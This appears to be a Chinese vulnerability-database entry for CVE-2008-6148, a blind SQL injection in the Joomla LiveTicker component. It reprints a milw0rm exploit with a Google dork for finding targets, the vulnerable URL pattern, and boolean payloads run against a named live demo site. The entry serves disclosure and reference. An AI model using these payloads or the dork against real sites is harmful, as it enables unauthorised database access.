Raven-Worx LiveTicker 'tid'参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117133 漏洞类型 SQL注入
发布时间 2008-12-24 更新时间 2009-02-16
CVE编号 CVE-2008-6148 CNNVD-ID CNNVD-200902-345
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7573
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-345
|漏洞详情
Joomla!是一款开放源码的内容管理系统(CMS),liveticker是Joomla的一个扩展组件。Joomla!LiveTicker(com_liveticker)模块1.0中存在SQL注入漏洞。远程攻击者可以借助对index.php的一个viewticker操作中的tid参数,执行任意SQL指令。
|漏洞EXP
#############################################################
Joomla Component com_liveticker(tid) Blind SQL-injection
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  Blind SQL injection 
#[~] Google Dork   :  inurl:com_liveticker 
--------------------------------------------------
#[!] Name          :  Live Ticker
#[!] Author        :  raven-worx
#[!] AuthorEmail   :  info@raven-worx.net
#[!] Version       :  1.0.0
###################################################

Example:
http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]



LiveDEMO:


http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)


http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)




##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-24]
|参考资料

来源:XF
名称:liveticker-index-sql-injection(47605)
链接:http://xforce.iss.net/xforce/xfdb/47605
来源:BID
名称:33010
链接:http://www.securityfocus.com/bid/33010
来源:SECUNIA
名称:33312
链接:http://secunia.com/advisories/33312
来源:MILW0RM
名称:7573
链接:http://milw0rm.com/exploits/7573